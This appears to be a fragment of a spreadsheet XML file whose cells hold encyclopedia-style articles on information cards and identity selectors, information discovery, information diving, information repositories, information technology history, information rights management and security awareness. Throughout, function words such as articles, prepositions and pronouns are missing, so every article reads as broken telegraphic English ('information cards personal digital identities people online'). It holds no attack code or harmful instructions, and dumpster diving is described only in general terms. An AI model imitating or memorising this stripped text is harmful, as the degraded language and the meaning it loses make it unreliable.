    <t>information cards personal digital identities people online, component identity metasystem. visually, i-card card-shaped picture card name associated enable people organize digital identities easily select want given interaction. information card metaphor implemented identity selectors like windows cardspace, digitalme higgins identity selector. identity metasystem interoperable architecture digital identity enables people employ collection digital identities based multiple underlying technologies, implementations, providers. using approach, customers continue existing identity infrastructure investments, choose identity technology works best them, easily migrate technologies technologies without sacrificing interoperability others. identity metasystem based upon principles "the laws identity". overview there three participants digital identity interactions using information cards: identity providers issue digital identities you. example, businesses might issue identities customers, governments might vouch identities citizens, credit card issuers might provide identities enabling payment, online services could provide verified data age, individuals might self-issued identities onto websites. relying parties (rps) accept identities you. online services accept digital identities choose information provided behalf, consent. subject yourself, party control interactions. subject choose applicable digital identities relying party. selectors identity selector used store, manage, digital identities. examples identity selectors microsoft's windows cardspace, bandit project's digitalme, several kinds identity selectors eclipse foundation's higgins project. identity selector performs following user-centric identity management tasks: provides consistent user experience authentication (and cases kinds interactions) (also known service provider). provides user interface displays information card icons user selects preferred i-card authentication required local application relying party (e.g. website's login page). provides user interface create manage personal (also known self-issued) information cards. provides local security token service used issue security tokens personal i-cards. provides user interface import export information cards standard file formats. invoked browser extension local rich client application.an identity selector also allow user manage (e.g. create, review, update, delete cards within) portfolio i-cards. identity metasystems there five components identity metasystem: represent identities using claims. claims carried security tokens, ws-security. means identity providers, relying parties, subjects negotiate. dynamically negotiating claims delivered security token format used enables identity metasystem carry format token kinds claims needed digital identity interaction. negotiation occurs using ws-securitypolicy statements exchanged using ws-metadataexchange. encapsulating protocol obtain claims requirements. ws-trust ws-federation protocols used carry requests security tokens responses containing tokens. means bridge technology organizational boundaries using claims transformation. security token services (sts) defined ws-trust used transform claim contents formats. consistent user experience across multiple contexts, technologies, operators. this achieved identity selector client software windows cardspace representing digital identities owned users visual i-cards. generic qualities i-cards created entity known issuer. i-cards display name issuer (issuername) text string. i-cards text string identify card (cardname) initially card issuer. typically card name user-editable. i-cards (gif jpeg) background image (cardimage) card issuer (user-editable). i-cards user able value claims. sign-in capabilities using i-cards, users authenticate without needing username password every website; instead, sites accepting them, i-card, used multiple sites. each information card utilizes distinct pair-wise digital every realm requested. realm single site related sites sharing target scope information requesting information card. distinct pair-wise keys realm means even person tricked logging imposter site i-card, different would used site site imposter trying impersonate; shared secret released. furthermore, many identity selectors provide means phishing detection, https certificate relying party site checked compared list sites user previously used information card. when site visited, user informed previously used card there. types i-cards identity selector interoperability profile oasis v1.0 committee draft) specifies types information cards identity selector must support. personal information cards: (also called self-issued) cards allow issue claims sites willing accept them. these claims include name, address, phone numbers, e-mail address, address, birth date, gender, site-specific uniquely generated site card used. managed information cards: these cards allow identity providers make claims sites willing accept them. these claims include information requests, identity provider able provide, willing send them.the higgins project defining kinds i-cards well: relationship cards r-cards) used establish ongoing relationship multiple parties. zero-knowledge cards z-cards)however information card format allows custom types; bandit project demonstrated prototype managed cards backed openids novell brainshare conference march 2007. personal cards first kind personal information cards also introduced part microsoft’s windows cardspace software november 2006. their behavior also defined documents covering microsoft-defined managed cards (see above). summary characteristics: data format file containing: claim type uris well (user-defined) values claims, cardimage, unique cardid, etc. this data format defined isip documents. issuer: user's identity selector. personal cards described self-issued genesis: created user's identity selector. claims: pre-defined claim types (e.g. firstname, surname, email address, etc.) defined identity selector interoperability profile oasis v1.0 committee draft). authority: user's identity selector authority issued token's claim values. data flow: demand (e.g. needed relying site), local identity selector creates security token current values. editability: claim values directly editable user. attribute data source: personal card file contains claim values. when imported identity selector data values managed internally selector. managed information cards first kind managed card introduced part microsoft’s windows cardspace software november 2006. behavior, file format interoperability characteristics kinds managed cards defined microsoft documents identity selector interoperability profile oasis v1.0 committee draft; self-issued.info complete list), combination open standards including ws-trust others. summary characteristics: data format: file containing: network endpoint sts, claim type uris, name card, cardimage, issuername, unique cardid, etc. file format defined isip documents. issuer: external, third party token service (representing external person organization). genesis: managed card generated security token service running identity provider site imported user's identity selector. claims: list supported claim types (claim type uris) defined issuer. authority: issuer sole authority claim values contained within token issues. data flow: managed cards contain network endpoint reference that, requested identity selector (using ws-trust, etc.) generates/provides security token containing required claims. editability: underlying attribute data directly editable user. attribute data source: determined issuer, generally managed issuer.i-cards issued third parties employ four methods user authenticate card owner: personal information card (self-issued), x.509 certificate (which either hardware device smartcard software certificate), kerberos ticket, issued many enterprise login solutions, username password card.additional methods could also implemented future identity selectors identity providers. managed i-cards auditing, non-auditing, auditing-optional: auditing cards require identity site disclosed identity provider. this used restrict sites identity provider willing release information non-auditing cards disclose identity site identity provider. auditing-optional cards disclose identity relying party site provided require disclosure. relationship cards relationship cards development higgins project (see report paul trevithick).summary characteristics: data format: managed card supports resource-udi claim. supported claims: like managed personal) cards, r-cards include list supported claim types (expressed uris) defined issuer. this defines maximal claims issuer include generated security token. these claims inherited underlying isip-m-card upon based used purposes. beyond managed cards resource-udi "meta" claim provides reference attributes. authority: issuer authority issued token's claim values normal managed personal card). editability: values underlying attributes (referenced resource-udi claim) editable parties issuer. supported attributes: value r-card's resource-udi claim entity (uri) "points data entity (representing person, organization, object). attributes data entity distinct (though usually superset "supported claims" mentioned above. reliance higgins data model conceptually managed card essentially human-friendly "pointer" token service—a service (e.g. sts) security tokens requested. security token attribute assertions (aka claims) party cryptographically signed issuer (the token service acting authority). r-card, contains second "pointer" points data entity whose attribute's values shared parties r-card (ii) form underlying attributes consumed r-card issuer's provide values claims makes. including second "pointer" r-card, r-card holders potential access update subset underlying attributes. card issuer maintains access control policy control level access. this second pointer entity udi—a reference entity object higgins context data model. entity udis dereferenced underlying entity's attributes accessed using higgins project's identity attribute service. once resolved, consumers service inspect, potentially modify attributes entity well schema described ontology language (owl). addition basic identity attribute values like strings numbers, data entity referred r-card complex attribute values consisting aggregates basic attribute types well links entities. claims beyond used sites, information cards also facilitate kinds interactions. information card model provides great flexibility cards used convey information identity provider relying party makes sense person willing release. data elements carried i-cards called claims. possible claims online verification, identity providers providing proof-of-age cards, accepting purposes online wine sales; attributes could verified well. another online payment, merchants could accept online payment cards payment issuers, containing minimal information needed facilitate payment. role statements carried claims used access control decisions relying parties. interoperability licensing protocols needed build identity metasystem components used anyone purpose licensing cost interoperable implementations built using publicly available documentation. patent promises issued microsoft, ibm, others ensuring protocols underlying identity metasystem freely used all. information cards defined identity selector interoperability profile oasis v1.0 committee draft) based open, interoperable communication standards. interoperable i-card components built dozens companies projects platforms including windows, linux, plus prototype implementation phones. together, components implement interoperable identity metasystem. information cards used provide identities sites services applications. several interoperability testing events i-cards sponsored osis burton group, interop october 2007 european catalyst conference barcelona recent 2008. these events helping ensure different information card software components built numerous participants identity metasystem work well together. protocols needed build information card implementations based identity selector interoperability profile oasis v1.0 committee draft) used anyone purpose cost interoperable implementations built using publicly available documentation. patent promises issued microsoft, ibm, others, ensuring information card technology freely available all. june 2008, industry leaders including equifax, google, microsoft, novell, oracle, paypal others created information card foundation order advance information card metaphor component open, interoperable, royalty-free, user-centric identity layer spanning enterprise internet. report interop june 2007 catalyst conference francisco, analyst blakley wrote: interop event milestone maturation user-centric identity technology. prior event, specifications, commercial product, number open-source projects. after event, accurately said running identity metasystem. history terminology term "information card" introduced microsoft 2005 name visual information card metaphor introduced forthcoming windows cardspace software. until early 2006, information cards also sometimes referred code-name “infocard”, name freely available use. name information card specifically chosen would freely available use, independent product implementation. name “information card” trademarked generic trademarkable. term i-card introduced june 2006, berkman/mit identity mashup conference. intent define term associated industry artifact. time, microsoft finished applying open specification promise protocols underlying windows cardspace also misunderstanding term information card freely available all, conservative, term i-card introduced. mike jones, microsoft, explained participants session 2007b microsoft always intended term information card used generically describe kinds information cards freely usable all, tried correct earlier misunderstanding term might apply kinds information cards originally defined microsoft. made case industry would better served everyone common term information card, terms meaning, since remains legal technical reason different terms. case term i-card would become short form information card, like e-mail become short form electronic mail. software implementations dacs open source information card written higgins project identity selector deployment configuration. windows cardspace runs windows vista, windows windows server 2003. also digital identity information card foundation openid saml references clique space: another look identity, owen thomas, november 2010. parity provides free online identity management 2008 cnet article robert vamosi microsoft's vision identity metasystem, michael jones, 2005. laws identity, cameron, 2005. design rationale behind identity metasystem architecture, cameron michael jones, january 2006. laws identity: case privacy-embedded laws identity digital age, cavoukian, information privacy commissioner ontario, october 2006. additional resources technology leaders favor online card over passwords york times article 24-jun-08 announcing information card foundation identity selector interoperability profile, arun nanda, april 2007. identity selector interoperability profile oasis v1.0 committee draft implementer's guide identity selector interoperability profile v1.0, microsoft corporation ping identity corporation, april 2007. guide using identity selector interoperability profile v1.0 within applications browsers, michael jones, april 2007. design rationale behind identity metasystem architecture, cameron michael jones, january 2006. patterns supporting information cards sites: personal cards sign signing bill barnes, garrett serack, james causey, august 2007. microsoft open specification promise, 2007. interoperability specifications pledge, july 2007. external links information card foundation information card icon announcement, june 2007. open source identity systems (osis)</t>
  </si>
  <si>
    <t>Information discovery</t>
  </si>
  <si>
    <t>information discovery term used legal corporate industry refers steps involved distilling corporation’s data corpus pertinent evidence pertaining court-related matter compliance directive. major information discovery steps include: managing entire data collection manner identify pertinent evidence associated matter, targeting information collection (forensically otherwise), processing identification (culling) relevant data, processing document hosting legal document/information review. global organizations deal legal discovery disclosure request electronically stored information “esi” paper documents regular basis. massive emergence evidence electronic format, emergence entirely forms evidence, present number cultural, practical, legal challenges corporations firms. managing massive amounts information involved legal matter sometimes tedious expensive. information discovery although similar term manage document review (attorney document review, document review) and/or electronic discovery (e-discovery, ediscovery) encompassing entire process involved identifying relevant information within legal matter. number software tools service providers exist today assist help facilitate process information discovery including early case assessment “eca” tools, hosting platforms, cloud services, managed document review firms. corporations also looking ways defray expense associated information discovery looking bringing solutions in-house insourcing third party service provider oftentimes requiring customization client involved. references electronically stored information: december 2006 amendments federal rules civil procedure, kenneth withers, northwestern journal technology intellectual property, vol.4 (2), kenneth withers. digital different? electronic disclosure discovery civil litigation". also knowledge discovery legal governance, risk management, compliance early case assessment external links http://www.edrm.net/ http://www.acc.com/ http://www.thesedonaconference.org/content/miscfiles/tscglossary_12_07.pdf further reading george paul bruce nearon (2006). "meet rules". discovery revolution. american association. isbn 1-59031-605-3. ronald hedges (2007). discovery electronically stored information. books. isbn 1-57018-672-3. jonathan redgrave (2007). sedona principles 2007: best practices recommendations principles addressing electronic document production. books. isbn 1-57018-677-4. albert marcella, albert marcella, jr., doug menendez (2007). "electronically stored information cyber forensics". cyber forensics. press. isbn 0-8493-8328-5.</t>
  </si>
  <si>
    <t>Information diving</t>
  </si>
  <si>
    <t>information diving practice recovering technical data, sometimes confidential secret, discarded material. recent times, chiefly data storage elements discarded computers, notably recoverable data remaining hard drives. those charge discarding computers usually neglect erase hard drive. often circumstances information diver copy installed software (e.g., word processors, operating systems, computer games, etc.). other data also available, credit card information stored machine. companies claim especially careful customer data, number data breaches type entity (e.g., education, health care, insurance, government, ...) suggest otherwise. information diving referred "binology."today, files, letters, memos, photographs, ids, passwords, credit cards, found dumpsters. many people consider sensitive information items discarded recovered. such information, recovered, sometimes usable fraudulent purposes (see also "identity theft" physical information security). this method dumpster diving also sometimes used attorneys agents seeking enforce court-ordered money judgments: judgment debtor's trash contain information assets more-readily located levying.supposedly, information diving common 1980s security; businesses became aware need increased security early 1990s, sensitive documents shredded placed dumpsters. there still considerable internet activity subject dumpster diving, unlikely stopped widespread introduction document shredding. security mythology curious hackers malicious crackers commonly technique. cases printed manuals earlier times, available discarded data included printed manuals design records. famous case, student, jerry schneider, discovered discarded manuals telephone system ordering/shipping system able build business selling 'surplus' gear ordered telephone company though internal company department. discarded computers students purchased large number obsolete computers yard sales, able obtain information credit card information return data. they published paper, remembrance things past, documenting discoveries. dumpster diving dumpster diving commonly practiced "watchdog" organizations seeking information groups investigating. trinity foundation successfully used technique report activities televangelist robert tilton also able obtain information benny hinn. also dumpster diving e-waste credit card fraud copyright infringement software benjamin pell references</t>
  </si>
  <si>
    <t>Information privacy</t>
  </si>
  <si>
    <t>Information repository</t>
  </si>
  <si>
    <t>information technology, information repository simply repository central place aggregation data kept maintained organized way, usually computer storage." "may aggregation data accessible place storage also imply ability selectively extract data." universal digital library concept universal digital library described "within reach" 2012 times article universal digital library within reach") told google's attempts "mass-digitize" termed "orphan works" out-of-print copyrighted works. u.s. copyright office european union working this. google reached agreements france "lets publisher choose works scanned sold." contrast, google trying "free digitize sell works unless copyright holders opted out" deal still unsuccessful. information repository attempts develop called "information repository" underway decades: 1989 tried officevision combine mainframes enable information repository." 2003 microsoft introduced onenote extension microsoft office 2003 would support personal information repository." 1996 1898-founded library obtained additional funding expand mission, become major "local resource center regional information repository." york times described "the second largest york city region, second york public library fifth avenue." their services include computer information center devoted outside-item requests." federated information repository federated information repository easy deploy secondary tier data storage comprise multiple, networked data storage technologies running diverse operating systems, data longer needs primary storage protected, classified according captured metadata, processed, de-duplicated, purged, automatically, based data service level objectives requirements. federated information repositories, data storage resources virtualized composite storage sets operate federated environment.federated information repositories developed mitigate problems arising data proliferation eliminate need separately deployed data storage solutions concurrent deployment diverse storage technologies running diverse operating systems. they feature centralized management deployed data storage resources. they self-contained, support heterogeneous storage resources, support resource management add, maintain, recycle, terminate media, track off-line media, operate autonomously. automated data management since main reasons implementation federated information repository reduce maintenance workload placed staff traditional data storage systems, federated information repositories automated. automation accomplished policies process data based time, events, data age, data content. policies manage following: file system space management irrelevant data elimination (mp3, games, etc.) secondary storage resource managementdata processed according media type, storage pool, storage technology. because federated information repositories intended reduce staff workload, designed easy deploy offer configuration flexibility, virtually limitless extensibility, redundancy, reliable failover. data recovery federated information repositories feature robust, client based data search recovery capabilities that, based permissions, enable users search information repository, view information repository contents, including data off-line media, recover individual files multiple files either original network computer another network computer. references</t>
  </si>
  <si>
    <t>Information Technology</t>
  </si>
  <si>
    <t>information technology (it) computers create, process, store, retrieve, exchange kinds data information. typically used within context business operations opposed personal entertainment technologies. forms part information communications technology (ict). information technology system system) generally information system, communications system, specifically speaking, computer system including hardware, software, peripheral equipment operated limited group users. humans storing, retrieving, manipulating, communicating information since sumerians mesopotamia developed writing 3000 however, term information technology modern sense first appeared 1958 article published harvard business review; authors harold leavitt thomas whisler commented "the technology single established name. shall call information technology (it)." their definition consists three categories: techniques processing, application statistical mathematical methods decision-making, simulation higher-order thinking computer programs.the term commonly used synonym computers computer networks, also encompasses information distribution technologies television telephones. several products services within economy associated information technology, including computer hardware, software, electronics, semiconductors, internet, telecom equipment, e-commerce.based storage processing technologies employed, possible distinguish four distinct phases development: pre-mechanical (3000 1450 ad), mechanical (1450—1840), electromechanical (1840—1940), electronic (1940 present). this article focuses recent period (electronic).information technology also branch computer science, defined overall study procedure, structure, processing various types data. field continues evolve across world, overall priority importance also grown, begin introduction computer science-related courses k-12 education. however, concerns raised fact schools lacking advanced-placement courses field. history computer technology ideas computer science first mentioned 1950s massachusetts institute technology (mit) harvard university, discussed began thinking computer circuits numerical calculations. time went field information technology computer science became complex able handle processing data. scholarly articles began published different organizations.looking early computing, alan turing, presper eckert, john mauchly considered major pioneers computer technology mid-1900s. giving credit developments, efforts focused designing first digital computer. along that, topics artificial intelligence began brought turing beginning question technology time period.devices used computation thousands years, probably initially form tally stick. antikythera mechanism, dating beginning first century generally considered earliest known mechanical analog computer, earliest known geared mechanism. comparable geared devices emerge europe 16th century, 1645 first mechanical calculator capable performing four basic arithmetical operations developed.electronic computers, using either relays valves, began appear early 1940s. electromechanical zuse completed 1941, world's first programmable computer, modern standards first machines could considered complete computing machine. during second world war, colossus developed first electronic digital computer decrypt german messages. although programmable, general-purpose, designed perform single task. also lacked ability store program memory; programming carried using plugs switches alter internal wiring. first recognizably modern electronic digital stored-program computer manchester baby, first program june 1948.the development transistors late 1940s bell laboratories allowed generation computers designed greatly reduced power consumption. first commercially available stored-program computer, ferranti mark contained 4050 valves power consumption kilowatts. comparison, first transistorized computer developed university manchester operational november 1953, consumed watts final version.several breakthroughs semiconductor technology include integrated circuit (ic) invented jack kilby texas instruments robert noyce fairchild semiconductor 1959, metal-oxide-semiconductor field-effect transistor (mosfet) invented mohamed atalla dawon kahng bell laboratories 1959, microprocessor invented hoff, federico faggin, masatoshi shima, stanley mazor intel 1971. these important inventions development personal computer (pc) 1970s, emergence information communications technology (ict).by year 1984, according national westminster bank quarterly review, term 'information technology' redefined "the development cable television made possible convergence telecommunications computing technology (…generally known britain information technology).” begin appearance term 1990 contained within documents international organization standardization (iso).innovations technology already revolutionized world twenty-first century people able access different online services. this changed workforce drastically thirty percent u.s. workers already careers profession. 136.9 million people personally connected internet, equivalent million households. along internet, types technology also introduced across globe, improved efficiency made things easier across globe. along technology revolutionizing society, millions processes could done seconds. innovations communication also crucial people began rely computer communicate telephone lines cable. introduction email really thing "companies part world could communicate e-mail suppliers buyers another part world..."not personally, computers technology also revolutionized marketing industry, resulting buyers products. during year 2002, americans exceeded billion goods internet alone e-commerce decade later resulted $289 billion sales. computers rapidly becoming sophisticated day, becoming used people becoming reliant twenty-first century. electronic data processing data storage early electronic computers colossus made punched tape, long strip paper data represented series holes, technology obsolete. electronic data storage, used modern computers, dates world form delay-line memory developed remove clutter radar signals, first practical application mercury delay line. first random-access digital storage device williams tube, based standard cathode tube. however, information stored delay-line memory volatile fact continuously refreshed, thus lost power removed. earliest form non-volatile computer storage magnetic drum, invented 1932 used ferranti mark world's first commercially available general-purpose electronic computer.ibm introduced first hard disk drive 1956, component ramac computer system.: most digital data today still stored magnetically hard disks, optically media cd-roms.: until 2002 information stored analog devices, year digital storage capacity exceeded analog first time. 2007, almost data stored worldwide held digitally: hard disks, optical devices, digital magnetic tape. estimated worldwide capacity store information electronic devices grew less exabytes 1986 exabytes 2007, doubling roughly every years. databases database management systems (dms) emerged 1960s address problem storing retrieving large amounts data accurately quickly. early system ibm's information management system (ims), still widely deployed years later. stores data hierarchically, 1970s codd proposed alternative relational storage model based theory predicate logic familiar concepts tables, rows, columns. 1981, first commercially available relational database management system (rdbms) released oracle.all consist components, allow data store accessed simultaneously many users maintaining integrity. databases common point structure data contain defined stored separately data itself, database schema.in recent years, extensible markup language (xml) become popular format data representation. although data stored normal file systems, commonly held relational databases take advantage "robust implementation verified years theoretical practical effort." evolution standard generalized markup language (sgml), xml's text-based structure offers advantage machine human-readable. data retrieval relational database model introduced programming-language independent structured query language (sql), based relational algebra. terms "data" "information" synonymous. anything stored data, becomes information organized presented meaningfully.: most world's digital data unstructured, stored variety different physical formats even within single organization. data warehouses began developed 1980s integrate disparate stores. they typically contain data extracted various sources, including external sources internet, organized facilitate decision support systems (dss).: data transmission data transmission three aspects: transmission, propagation, reception. broadly categorized broadcasting, information transmitted unidirectionally downstream, telecommunications, bidirectional upstream downstream channels.xml increasingly employed means data interchange since early 2000s, particularly machine-oriented interactions involved web-oriented protocols soap, describing "data-in-transit rather than... data-at-rest". data manipulation hilbert lopez identify exponential pace technological change kind moore's law): machines' application-specific capacity compute information capita roughly doubled every months 1986 2007; capita capacity world's general-purpose computers doubled every months decades; global telecommunication capacity capita doubled every months; world's storage capacity capita required roughly months double (every years); capita broadcast information doubled every 12.3 years.massive amounts data stored worldwide every day, unless analyzed presented effectively essentially resides called data tombs: "data archives seldom visited". address issue, field data mining "the process discovering interesting patterns knowledge large amounts data" emerged late 1980s. database problems technology becoming sophisticated day, increasing problems security everyone relies storing information computers ever. with data databases becoming dependent businesses organizations, considered "backbone" businesses organizations, hence resulting development different technological departments like departments personnel.along departments personnel, also different types agencies "strengthen" workforce. department homeland security (dhs) examples make sure organizations different necessities infrastructure security protect future different challenges head. branching dhs, many programs place well build cybersecurity awareness across organization workforce. identify quantify cybersecurity workforce understand workforce needs skills gaps hire right people clearly defined roles enhance employee skills training professional development create programs experiences retain talent services email technology services provides sending receiving electronic messages (called "letters" "electronic letters") distributed (including global) computer network. terms composition elements principle operation, electronic mail practically repeats system regular (paper) mail, borrowing terms (mail, letter, envelope, attachment, box, delivery, others) characteristic features ease use, message transmission delays, sufficient reliability time guarantee delivery. advantages e-mail are: easily perceived remembered person addresses form user_name@domain_name (for example, somebody@example.com); ability transfer plain text formatted, well arbitrary files; independence servers general case, address directly); sufficiently high reliability message delivery; ease humans programs. disadvantages e-mail: presence phenomenon spam (massive advertising viral mailings); theoretical impossibility guaranteed delivery particular letter; possible delays message delivery several days); limits size message total size messages mailbox (personal users). search system software hardware complex interface provides ability search information internet. search engine usually means site hosts interface (front-end) system. software part search engine search engine (search engine) programs provides functionality search engine usually trade secret search engine developer company. most search engines look information world wide sites, also systems look files servers, items online stores, information usenet newsgroups. improving search priorities modern internet (see deep article main problems work search engines). according statista, october 2021, search engine usage distributed follows: google 86,64%; bing yahoo! 2.75%.according statcounter global stats august 2021, asia, chinese resource baidu managed take almost internet market. turn, yandex region bypassed yahoo, receiving share almost third place ranking. perspectives academic perspective academic context, association computing machinery defines information technology "undergraduate degree programs prepare students meet computer technology needs business, government, healthcare, schools, kinds organizations specialists assume responsibility selecting hardware software products appropriate organization, integrating products organizational needs infrastructure, installing, customizing, maintaining applications organization’s computer users."undergraduate degrees (b.s., a.s.) similar computer science degrees. fact, oftentimes foundational level courses. computer science (cs) programs tend focus theory design, whereas information technology programs structured equip graduate expertise practical application technology solutions support modern business user needs.however true cases. example, india engineering degree information technology (b.tech 4-year professional course considered equivalent degree degree computer science engineering since share strikingly similar syllabus across many universities india.b.tech degree focuses heavily mathematical foundations computer science since students taught calculus, linear algebra, graph theory discrete mathematics first years. b.tech. program also contains core computer science courses like data structures, algorithm analysis design, compiler design, automata theory, computer architecture, operating systems, computer networks etc. graduate level entrance examination required masters engineering india-gate-is common undergraduates. commercial employment perspective companies information technology field often discussed group "tech sector" "tech industry." these titles misleading times mistaken “tech companies;" generally large scale, for-profit corporations sell consumer technology software. also worth noting business perspective, information technology departments “cost center” majority time. cost center department staff incurs expenses, “costs," within company rather generating profits revenue streams. modern businesses rely heavily technology day-to-day operations, expenses delegated cover technology facilitates business efficient manner usually seen “just cost business." departments allocated funds senior leadership must attempt achieve desired deliverables staying within budget. government private sector might different funding mechanisms, principles more-or-less same. this often overlooked reason rapid interest automation artificial intelligence, constant pressure less opening door automation take control least minor operations large companies. many companies departments managing computers, networks, technical areas businesses. companies also sought integrate business outcomes decision-making bizops business operations department.in business context, information technology association america defined information technology "the study, design, development, application, implementation, support, management computer-based information systems". responsibilities working field include network administration, software development installation, planning management organization's technology life cycle, hardware software maintained, upgraded, replaced. information services information services term somewhat loosely applied variety it-related services offered commercial companies, well data brokers. ethical perspectives field information ethics established mathematician norbert wiener 1940s.: some ethical issues associated information technology include:: 20–21 breaches copyright downloading files stored without permission copyright holders employers monitoring employees' emails internet usage unsolicited emails hackers accessing online databases sites installing cookies spyware monitor user's online activities, used data brokers need computer security when talking computer security, think computers hacked taken cybercriminals. however, computer security deal protecting internal components computer, also protecting natural disasters like tornadoes, floods, fires, etc. computer security basically short "protecting computer harm," meaning natural disasters, cyber criminals, pretty much anything hurt computer internally externally.cybersecurity topic computer security category basically deals protecting technology unwanted cyber criminals trolls. important aspect businesses organizations critical overall health well-being organization's structure. technology getting sophisticated day, rate cyber attacks security breaches also increasing, meaning maintaining proper cybersecurity awareness work force important. with maintaining proper cyber security around workplace, people special skill able "protect" business organization. there several different categories broken into, networking databases information systems.with computer security, comes need professionals, people educational experience different fields profession help protect networks, databases, computer systems internal external threats could potentially cause harm. with technology getting sophisticated, comes increased threat internal harm computers technology, meaning ransomware, malware, spyware, phishing attacks. these actually different issues professionals deal wide variety different types attacks across globe. along different issues attacks, also numerous amount specialties profession. these contain everything general topic computer science, computer engineering, software engineering, information systems, computer systems. world continues advance technology, desperate need people professions help "make" "execute" upgrades help make technology software secure reliable worldwide. also references notes citations bibliography further reading allen, morton, morton, eds. (1994), information technology corporation 1990s, oxford university press. gitta, cosmas south, david (2011). southern innovator magazine issue mobile phones information technology: united nations office south-south cooperation. issn 2222—9280. gleick, james (2011).the information: history, theory, flood. york: pantheon books. price, wilson (1981), introduction computer data processing, holt-saunders international editions, isbn 978-4-8337-0012-2. shelly, gary, cashman, thomas, vermaat, misty, walker, tim. (1999). discovering computers 2000: concepts connected world. cambridge, massachusetts: course technology. webster, frank, robins, kevin. (1986). information technology luddite analysis. norwood, ablex. external links learning materials related information technology wikiversity media related information technology wikimedia commons quotations related information technology wikiquote</t>
  </si>
  <si>
    <t>Information rights management</t>
  </si>
  <si>
    <t>information rights management (irm) subset digital rights management (drm), technologies protect sensitive information unauthorized access. sometimes referred e-drm enterprise digital rights management. this cause confusion, digital rights management (drm) technologies typically associated business-to-consumer systems designed protect rich media music video. technology allows information (mostly form documents) ‘remote controlled’. this means information control separately created, viewed, edited distributed. true system typically used protect information business-to-business model, financial data, intellectual property executive communications. currently applies mainly documents emails. features technologies typically number features allow owner control, manage secure information unwanted access. information encryption information rights management solutions encryption prevent unauthorized access. password used control access encrypted data. permissions management once document encrypted unauthorized users, user apply certain access permissions permit deny user taking certain actions piece information. some standard permissions included below. strong protection, controlling copy paste, preventing screenshots, printing, editing. rights model/policy allows easy mapping business classifications information. offline allowing users create/access sealed documents without needing network access certain periods time. full auditing access documents well changes rights/policy business users.it also allows users change revoke access permissions without sharing document again. examples example would secure sensitive engineering document distributed environment document's recipients could necessarily trusted. alternatively, e-mail could secured irm. email accidentally forwarded untrusted party, authorized users gain access. well designed system limit ability information shared. rules enforced people attempt gain access. this important often people share sensitive information users legitimately access don't. technology must facilitate control sensitive information situation. secure shared secret passwords. management used protect information whilst rest hard disk, network drive storage device. continues protect control access document use. functionality preventing screen shots, disallowing copying data secure document insecure environment guarding information programmatic attack, elements effective solution. naming conventions information rights management also known following names: enterprise rights management enterprise enterprise digital rights management document rights management intelligent rights management also digital rights management always-on copyright infringement encryption advanced encryption standard rpmsg references</t>
  </si>
  <si>
    <t>Information security awareness</t>
  </si>
  <si>
    <t>information security awareness evolving part information security focuses raising consciousness regarding potential risks rapidly evolving forms information rapidly evolving threats information target human behavior. threats matured information increased value, attackers increased capabilities expanded broader intentions, developed attack methods methodologies acting diverse motives. information security controls processes matured, attacks matured circumvent controls processes. attackers targeted successfully exploited individuals human behavior breach corporate networks critical infrastructure systems. targeted individuals unaware information threats unknowingly circumvent traditional security controls processes enable breach organization. response, information security awareness maturing. cybersecurity business problem dominated agenda chief information officers (cio)s, exposing need countermeasures today's cyber threat landscape. goal information security awareness make everyone aware susceptible opportunities challenges today's threat landscape, change human risk behaviors create enhance secure organizational culture. background information security awareness several principles information security. information security awareness seeks understand enhance human risk behaviors, beliefs perceptions information information security also understanding enhancing organizational culture countermeasure rapidly evolving threats. example, oecd's guidelines security information systems networks include nine generally accepted principles: awareness, responsibility, response, ethics, democracy, risk assessment, security design implementation, security management, reassessment. context internet, type awareness sometimes referred cyber security awareness, focus multiple initiatives, including u.s. department homeland security's national cyber security awareness month president obama's 2015 white house summit cybersecurity consumer protection.computer based crimes something viruses well years; spyware clocked decade since earliest incidents; large-scale phishing traced back least 2003. reasons researchers agreed upon pace information system evolving expanding, security awareness program among employees falling behind. unfortunately, however, seems rapid adoption online services matched corresponding embrace security culture. evolution information security awareness evolving response evolving nature cyber attacks, increased targeting personal information cost scale information security breaches. furthermore, many individuals think security terms technical controls, realizing individuals targets, behavior increase risks provide countermeasures risks threats. determining measuring information security awareness highlighted need accurate metrics. response need, information security awareness metrics rapidly evolving order understand measure human threat landscape, measure change human understanding behavior, measure reduce organizational risk measure effectiveness cost information security awareness countermeasure.most organizations want invest money information security. survey conducted pricewaterhousecoopers (2014) found current employees (31%) former employees (27%) still contribute information security incidents. survey results indicated number actual incidents attributable employees risen since 2013 survey. recent study, verizon data breach investigations report 2020, discovered similar patterns cyber security incidents involving internal actors within company. necessity security awareness program security awareness program best solution organization adopt reduce security threats caused internal employees. security awareness program helps employees understand information security individual's responsibility; responsibility everyone. program also explicitly mentions employees responsible activities performed identifications. furthermore, program enforces standard ways handling business computers. although organizations adopted standard providing security awareness program, good program include awareness data, network, user conduct, social media, mobile devices wifi, phishing emails, social engineering different types viruses malware. effective employee security awareness program make clear everyone organization responsible security. auditors close attention areas covered program: data, networks, user conduct, social media, mobile devices, social engineering.many organizations make privacy policies complicated diverse employees always fail understand regulations. privacy policy something reminded employees whenever login business computer. privacy policies clearer, shorter standardized enable better comprehension comparison privacy practices. organizations create interactive sessions employees attend every week speak security threats. interactive sessions include awareness newer threats, best practices questions answers. security awareness program beneficial organization penalize violators. employees found guilty violating program reported higher executives action, otherwise program effective. information security authorities perform analysis find deficiencies program. current state early 2015, cios rated information security awareness related issues strategic priorities. example, february 2015 wall street journal network event convened create prioritized recommendations drive business policy coming year, consensus seemed form around cybersecurity delivering change effective communication rest business.while information security awareness high-profile breaches forefront organization's agenda, recent study security awareness officers lance spritzner uncovered three related findings. first, executive financial support necessary successful security awareness program. second, technical nature traditional security controls countermeasures, soft skills necessary understand change human behavior lacking finally, terms maturity model, security awareness still infancy. challenge measurement effectively measuring human risk behavior difficult risky behaviors, beliefs perceptions often unknown. addition attacks phishing, social engineering, incidents data leakage sensitive data posted social media sites even breaches undetected unknown make difficult determine measure points failure. often, attacks, incidents breaches reacted reported outside compromised organization attackers covered tracks, thus cannot researched measured proactively. addition, malicious traffic often goes unnoticed attackers often mimic known behavior order prevent intrusion detection access monitoring alerts. 2016 study developed method measuring security awareness. specifically measured "understanding circumventing security protocols, disrupting intended functions systems collecting valuable information, getting caught" 38). researchers created method could distinguish experts novices people organize different security scenarios groups. experts organize scenarios based centralized security themes novices organize scenarios based superficial themes. where simulated phishing campaigns regularly, provide measures user compliance. also situation awareness computer literacy digital literacy references external links security awareness cycle</t>
  </si>
  <si>
    <t>Information security indicators</t>
  </si>
  <si>
